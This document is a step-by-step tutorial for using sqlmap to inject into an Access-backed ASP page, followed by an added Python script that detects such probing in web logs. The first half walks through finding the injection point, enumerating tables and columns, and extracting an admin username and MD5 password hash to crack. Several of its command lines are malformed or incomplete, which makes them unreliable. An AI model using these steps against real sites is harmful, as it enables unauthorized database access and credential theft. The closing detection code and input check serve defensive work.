Using the sqlmap tool for Access injection:
1. Determine if a URL has an injection point and determine the database type based on the returned data:
    "http://abcd****efg.asp?id=7"
Suppose the returned content is as follows:
    [INFO] resuming back-end 'Microsoft Access'
2. Guess the database tables, enter:
    "http://abcd****efg.asp?id=7" --tables
3. When prompted for the number of threads, enter 10. After you press Enter, the table enumeration starts; once the appropriate table has been found, press CTRL + C to stop the enumeration.
Suppose you find these tables: admin, Mark, Province, vote
    [4 tables]
    +----------+
    | admin    |
    | Mark     |
    | province |
    | vote     |
    +----------+
4. Guess the fields of the admin table:
    "http://abcd****efg.asp?id=7" --tables --columns -T admin
Suppose you find the following fields for the admin table: id, username, password
    Retrieved: id
    Retrieved: username
    Retrieved: password
5. Guess the contents of the fields:
    "http://abcd****efg.asp?id=7" "username,password"
Suppose the results obtained are:
    +----------+----------------------------------+
    | Username | Admin                            |
    +----------+----------------------------------+
    | password | 21232F297A57A5A743894A0E4A801FC3 |
    +----------+----------------------------------+
The password value is a 32-character MD5 hash, not the password itself.
Account: admin. Password: recovered by cracking the MD5 hash.
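
Seen from the server side, the steps above leave a recognizable trail in the web log: id values that are not plain integers, arriving in a burst when the table guess runs with 10 threads. The following is an added example, not part of the original notes, that flags such clients; the /page.asp path, the log tuple layout and the thresholds are assumptions, and because sqlmap's default "sqlmap/" User-Agent can be changed, the check on the id value carries the weight.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample requests: (client IP, time in seconds, URL, User-Agent).
SAMPLE_LOG = [
    ("198.51.100.7", 0, "/page.asp?id=7", "Mozilla/5.0"),
    ("198.51.100.7", 30, "/page.asp?id=12", "Mozilla/5.0"),
    ("203.0.113.9", 100, "/page.asp?id=7", "sqlmap/1.0 (constructed)"),
] + [
    # Burst of non-numeric id values, as a multi-threaded table guess produces.
    ("203.0.113.9", 101 + i // 10, f"/page.asp?id=7%20AND%20{i}%3D{i}", "Mozilla/5.0")
    for i in range(40)
]

INT_ID = re.compile(r"\d{1,10}")  # the page's id parameter should only ever be an integer

def request_reasons(url, user_agent, param="id"):
    """Return the reasons a single request looks like injection probing."""
    reasons = set()
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [])
    if any(not INT_ID.fullmatch(v) for v in values):
        reasons.add("non-integer id")
    if user_agent.lower().startswith("sqlmap/"):
        reasons.add("sqlmap user-agent")
    return reasons

def flag_clients(log, window=5, threshold=20):
    """Map client IP -> reasons; adds 'burst' when >= threshold bad ids fall within `window` s."""
    flagged, bad_times = defaultdict(set), defaultdict(list)
    for ip, ts, url, ua in log:
        reasons = request_reasons(url, ua)
        if reasons:
            flagged[ip] |= reasons
        if "non-integer id" in reasons:
            bad_times[ip].append(ts)
    for ip, times in bad_times.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged[ip].add("burst")
                break
    return dict(flagged)

if __name__ == "__main__":
    for ip, reasons in flag_clients(SAMPLE_LOG).items():
        print(ip, sorted(reasons))
```

The same integer check, applied in the ASP page before the value reaches the query, closes the injection point that step 1 relies on.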